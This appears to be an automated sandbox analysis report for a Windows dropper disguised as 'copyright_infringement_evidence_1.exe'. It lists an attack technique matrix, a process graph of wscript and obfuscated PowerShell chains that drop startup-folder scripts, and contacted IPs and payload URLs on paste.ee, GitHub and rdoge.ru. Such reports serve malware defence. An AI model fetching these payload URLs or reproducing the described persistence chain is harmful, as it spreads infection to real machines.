            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18CC7CC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7A18CC7CC
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\Public\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18B6DF0 getsockname,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF7A18B6DF0
            Source: C:\Users\user\Desktop\copyright_infringement_evidence_1.exeCode function: 0_2_00007FF7A18740C0 bind,0_2_00007FF7A18740C0
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information211
            Scripting
            Valid Accounts1
            Exploitation for Client Execution
            211
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            111
            Process Injection
            11
            Deobfuscate/Decode Files or Information
            LSASS Memory12
            File and Directory Discovery
            Remote Desktop Protocol1
            Data from Local System
            Junk DataExfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts3
            PowerShell
            2
            Registry Run Keys / Startup Folder
            2
            Registry Run Keys / Startup Folder
            2
            Obfuscated Files or Information
            Security Account Manager13
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Software Packing
            NTDS1
            Query Registry
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            Security Software Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Masquerading
            Cached Domain Credentials1
            Process Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion
            DCSync21
            Virtualization/Sandbox Evasion
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
            Remote System Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
            System Network Configuration Discovery
            Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1528568 Sample: copyright_infringement_evid... Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 105 Multi AV Scanner detection for domain / URL 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->109 111 12 other signatures 2->111 9 copyright_infringement_evidence_1.exe 5 2->9         started        14 wscript.exe 2->14         started        16 cmd.exe 2->16         started        18 cmd.exe 2->18         started        process3 dnsIp4 97 172.214.220.82 IFX18747US United States 9->97 99 172.67.158.129 CLOUDFLARENETUS United States 9->99 85 C:\Users\user\AppData\...\start_2x_bee.js.bat, DOS 9->85 dropped 87 C:\Users\user\AppData\...\start_2p_bee.js.bat, DOS 9->87 dropped 89 C:\Users\Public\Documents\2x_bee.js, Unicode 9->89 dropped 91 C:\Users\Public\Documents\2p_bee.js, Unicode 9->91 dropped 135 Drops script or batch files to the startup folder 9->135 20 wscript.exe 1 1 9->20         started        24 wscript.exe 9->24         started        27 cmd.exe 3 2 9->27         started        37 2 other processes 9->37 137 System process connects to network (likely due to code injection or exploit) 14->137 139 Suspicious powershell command line found 14->139 141 Wscript starts Powershell (via cmd or directly) 14->141 39 2 other processes 14->39 29 wscript.exe 16->29         started        31 conhost.exe 16->31         started        33 wscript.exe 18->33         started        35 conhost.exe 18->35         started        file5 signatures6 process7 dnsIp8 95 188.114.96.3 CLOUDFLARENETUS European Union 20->95 113 Suspicious powershell command line found 20->113 115 Wscript starts Powershell (via cmd or directly) 20->115 117 Drops script or batch files to the startup folder 20->117 125 3 other signatures 20->125 41 cmd.exe 20->41         started        44 powershell.exe 20->44         started        83 C:\Users\user\AppData\Roaming\...\CJJ.js, Unicode 24->83 dropped 46 cmd.exe 24->46         started        48 powershell.exe 24->48         started        119 Uses ping.exe to sleep 27->119 121 Uses ping.exe to check the status of other devices and networks 27->121 50 2 other processes 27->50 52 2 other processes 29->52 54 2 other processes 33->54 56 2 other processes 37->56 123 Obfuscated command line found 39->123 58 5 other processes 39->58 file9 signatures10 process11 signatures12 70 3 other processes 41->70 127 Suspicious powershell command line found 44->127 129 Obfuscated command line found 44->129 72 2 other processes 44->72 131 Wscript starts Powershell (via cmd or directly) 46->131 133 Uses ping.exe to sleep 46->133 60 powershell.exe 46->60         started        63 PING.EXE 46->63         started        66 conhost.exe 46->66         started        74 2 other processes 48->74 68 AcroCEF.exe 105 50->68         started        76 5 other processes 52->76 78 5 other processes 54->78 process13 dnsIp14 143 Suspicious powershell command line found 60->143 145 Obfuscated command line found 60->145 147 Found suspicious powershell code related to unpacking or dynamic code loading 60->147 101 127.0.0.1 unknown unknown 63->101 80 AcroCEF.exe 2 68->80         started        103 185.199.109.133 FASTLYUS Netherlands 72->103 signatures15 process16 dnsIp17 93 23.47.168.24 AKAMAI-ASUS United States 80->93

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            copyright_infringement_evidence_1.exe17%ReversingLabsWin64.Dropper.Generic
            copyright_infringement_evidence_1.exe15%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txt10%VirustotalBrowse
            https://docs.rs/getrandom#nodejs-es-module-support0%VirustotalBrowse
            https://go.microsoft.co1%VirustotalBrowse
            http://paste.ee/1%VirustotalBrowse
            https://www.google.com0%VirustotalBrowse
            https://raw.githubusercontent.co6%VirustotalBrowse
            https://analytics.paste.ee1%VirustotalBrowse
            http://172.214.220.82/data/Benefits.pdf2%VirustotalBrowse
            https://cdnjs.cloudflare.com0%VirustotalBrowse
            http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
            https://paste.ee/92%VirustotalBrowse
            https://paste.ee//a0%VirustotalBrowse
            https://paste.ee/13%VirustotalBrowse
            http://www.microsoft.0%VirustotalBrowse
            https://secure.gravatar.com0%VirustotalBrowse
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://paste.ee/d/6wscript.exe, 00000008.00000003.2755090080.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757118395.000001C4CE1B2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2752222728.000001C4CE1B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmpfalse
              unknown
              https://go.microsoft.copowershell.exe, 0000001F.00000002.2686280354.000001BA72CA4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              http://paste.ee/d/6fcuVl6r.dllwscript.exe, 00000008.00000003.2741039661.000001C4CE1A2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2755090080.000001C4CE1A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2751783245.000001C4CE1A7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNote_J.txtpowershell.exe, 00000034.00000002.2542796485.000002103DDDE000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                http://paste.ee/d/6fcuVwscript.exe, 00000008.00000003.2754225942.000001C4D0006000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2759045448.000001C4CE4EA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2754808331.000001C4D0007000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2753774026.000001C4CE4E9000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://paste.ee/d/0Hqnxtewscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://paste.ee/d/0wscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756878169.0000024591734000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752132639.000002459172E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2754105505.0000024591732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000024.00000002.2492413706.000001EF61CE8000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://paste.ee/Newscript.exe, 00000027.00000002.3471457140.0000025469980000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://docs.rs/getrandom#nodejs-es-module-supportcopyright_infringement_evidence_1.exe, copyright_infringement_evidence_1.exe, 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000000.2054790226.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpfalseunknown
                        https://analytics.paste.eewscript.exe, 0000002C.00000003.2827342790.000001A7C49D0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://paste.ee/d/6fcuVee/dwscript.exe, 00000008.00000003.2745856502.000001C4CE1F8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.2757884807.000001C4CE1F9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2741039661.000001C4CE1EC000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          https://paste.ee/d/6fcuVPwscript.exe, 00000008.00000002.2758183805.000001C4CE20F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749612240.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2745856502.000001C4CE20C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.2749879678.000001C4CE20E000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://rdoge.ru/bee/config.jsonfcopyright_infringement_evidence_1.exe, 00000000.00000002.2763562068.00000139D8A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://172.214.220.82/data/2x_bee.jscopyright_infringement_evidence_1.exe, 00000000.00000003.2114946387.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2762559707.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069408795.00000139D8AB0000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2120938127.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2109519395.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2069485125.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000003.2115104514.00000139D8A88000.00000004.00000020.00020000.00000000.sdmp, copyright_infringement_evidence_1.exe, 00000000.00000002.2763847177.00000139D8A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://paste.ee/wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                http://paste.ee/d/0Hqnxwscript.exe, 0000000A.00000003.2751835714.000002459172B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2759005910.00000245935F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2747396981.0000024591724000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753930221.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2753152909.00000245919C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2756734173.000002459172C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.2752530561.00000245938C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758612409.00000245919CA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.2758847618.00000245935C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473103355.0000025469B55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3471457140.0000025469917000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3473731925.000002546B766000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000027.00000002.3475106348.000002546BA30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3471646885.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3473543541.000001A7C67C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2828182753.000001A7C4950000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830702699.000001A7C6801000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000003.2830853242.000001A7C6806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000002C.00000002.3472903249.000001A7C4C95000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
